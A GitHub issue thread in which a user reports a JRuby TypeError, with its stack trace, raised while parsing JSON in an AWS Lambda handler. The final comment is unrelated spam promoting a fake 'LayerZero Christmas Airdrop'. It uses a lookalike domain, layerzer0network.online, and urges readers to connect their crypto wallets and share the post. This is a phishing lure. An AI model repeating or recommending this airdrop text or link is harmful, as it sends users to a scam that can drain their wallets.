### ISSUE TITLE
TypeError: no implicit conversion of Java::JavaUtil::LinkedHashMap into String

### ISSUE THREAD

**Issue by desnudopenguino** [desnudopenguino/aws-lambda-jruby#1]
`
TypeError: no implicit conversion of Java::JavaUtil::LinkedHashMap into String
  initialize at json/ext/Parser.java:174
         new at json/ext/Parser.java:151
       parse at uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:155
        load at uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:334
       <top> at classpath:/main.rb:4
(TypeError) no implicit conversion of Java::JavaUtil::LinkedHashMap into String: org.jruby.embed.EvalFailedException
org.jruby.embed.EvalFailedException: (TypeError) no implicit conversion of Java::JavaUtil::LinkedHashMap into String
	at org.jruby.embed.internal.EmbedEvalUnitImpl.run(EmbedEvalUnitImpl.java:131)
	at org.jruby.embed.ScriptingContainer.runUnit(ScriptingContainer.java:1307)
	at org.jruby.embed.ScriptingContainer.runScriptlet(ScriptingContainer.java:1352)
	at AWSLambdaJRuby.handler(AWSLambdaJRuby.java:24)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
Caused by: org.jruby.exceptions.RaiseException: (TypeError) no implicit conversion of Java::JavaUtil::LinkedHashMap into String
	at json.ext.Parser.initialize(json/ext/Parser.java:174)
	at json.ext.Parser.new(json/ext/Parser.java:151)
	at RUBY.parse(uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:155)
	at RUBY.load(uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:334)
	at RUBY.<top>(classpath:/main.rb:4)
`

This happens when running the base stack after deployment.

**Comment by desnudopenguino** [comment]
initialize at json/ext/Parser.java:174
         new at json/ext/Parser.java:151
       parse at uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:155
        load at uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:334
       <top> at classpath:/main.rb:4
(TypeError) no implicit conversion of Java::JavaUtil::LinkedHashMap into String: org.jruby.embed.EvalFailedException
org.jruby.embed.EvalFailedException: (TypeError) no implicit conversion of Java::JavaUtil::LinkedHashMap into String
	at org.jruby.embed.internal.EmbedEvalUnitImpl.run(EmbedEvalUnitImpl.java:131)
	at org.jruby.embed.ScriptingContainer.runUnit(ScriptingContainer.java:1307)
	at org.jruby.embed.ScriptingContainer.runScriptlet(ScriptingContainer.java:1352)
	at AWSLambdaJRuby.handler(AWSLambdaJRuby.java:24)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
Caused by: org.jruby.exceptions.RaiseException: (TypeError) no implicit conversion of Java::JavaUtil::LinkedHashMap into String
	at json.ext.Parser.initialize(json/ext/Parser.java:174)
	at json.ext.Parser.new(json/ext/Parser.java:151)
	at RUBY.parse(uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:155)
	at RUBY.load(uri:classloader:/META-INF/jruby.home/lib/ruby/stdlib/json/common.rb:334)
	at RUBY.<top>(classpath:/main.rb:4

**Comment by gqgserver** [comment]
# $1000 Christmas Airdrop for 10,000 Eligible Users! 🎅🎁

Welcome to the festive $1000 Christmas Airdrop by LayerZero! Get ready to unwrap the joy and claim your share of $ZRO tokens. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*SalqMtUhedutBSfrW7-T-A.png)

## Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Christmas Spirit:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Instagram:**
     [Share on Instagram](https://instagram.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&title=LayerZero+Christmas+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero Christmas Airdrop and secure your $ZRO tokens.

Don't miss out on this festive collaboration – claim your Christmas tokens now and let the holiday spirit shine with LayerZero!
